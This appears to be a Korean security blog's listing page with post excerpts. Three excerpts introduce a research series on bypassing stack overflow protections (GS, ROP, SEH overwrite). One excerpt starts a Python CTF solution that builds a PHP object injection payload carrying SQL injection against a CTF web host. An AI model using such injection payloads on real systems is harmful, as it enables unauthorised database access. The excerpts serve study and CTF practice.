전체172 BOF 3 메모리 보호기법 우회 연구분석보고서 -3- By. eloi@a3sc.co.kr (A.K.A eloi) jtsong@a3sc.co.kr (A.K.A trynerr) 본 문서는 Stack Overflow 보호기법과 이를 우회하는 방법에 대하여 작성하였습니다. 해당 내용과 테스트 결과가 많은 관계로아래와 같은 주제로 3회에 걸쳐 연재합니다. 1. 'Windows/Linux 환경에서의 Stack Overflow 보호기법' 2. 'ROP(Return Oriented Programming) Exploit' 3. 'SEH(Structed Exception Handling) Overwrite' SEH(Structed Exception Handling) Overwrite 1. GS 우회 가능성 GS 옵션으로 컴파일 시,.. 2015. 6. 4. BOF 1 메모리 보호기법 우회 연구분석보고서 -1- By. eloi@a3sc.co.kr (A.K.A eloi) jtsong@a3sc.co.kr (A.K.A trynerr) 본 문서는 Stack Overflow 보호기법과 이를 우회하는 방법에 대하여 작성하였습니다. 해당 내용과 테스트 결과가 많은 관계로아래와 같은 주제로 3회에 걸쳐 연재하도록 하겠습니다. 1. 'Windows/Linux 환경에서의 Stack Overflow 보호기법' 2. 'ROP(Return Oriented Programming) Exploit' 3. 'SEH(Structed Exception Handling) Overwrite' Window 환경에서의 메모리 보호기법1. Window 버전별 메모리 보호기법Window의 각 버젼에서 실행되고 있.. 2015. 6. 4. BOF 2 메모리 보호기법 우회 연구분석보고서 -2- By. eloi@a3sc.co.kr (A.K.A eloi) jtsong@a3sc.co.kr (A.K.A trynerr) 본 문서는 Stack Overflow 보호기법과 이를 우회하는 방법에 대하여 작성하였습니다. 해당 내용과 테스트 결과가 많은 관계로아래와 같은 주제로 3회에 걸쳐 연재하도록 하겠습니다. 1. 'Windows/Linux 환경에서의 Stack Overflow 보호기법' 2. 'ROP(Return Oriented Programming) Exploit' 3. 'SEH(Structed Exception Handling) Overwrite' ROP(Return Oriented Programming) Exploit 1. ROP(Return Oriented .. 2015. 6. 4. CamsCTF WEB F #!/usr/bin/python ######################################## ###PHP Object Injection+SQL Injection### ######################################## from base64 import * import StringIO import pycurl import time key="" def serial(s): slen=len(s)+1 return b64encode("""O:5:"Login":1:{s:12:"\x00Login\x00table";s:%d:"%s#";}"""% (slen,s)) print "Start!" curl = pycurl.Curl() attackurl="http://web.camsctf.com/.. 2015. 6. 4. 이전 1 ··· 24 25 26 27 28 29 30 ··· 43 다음 반응형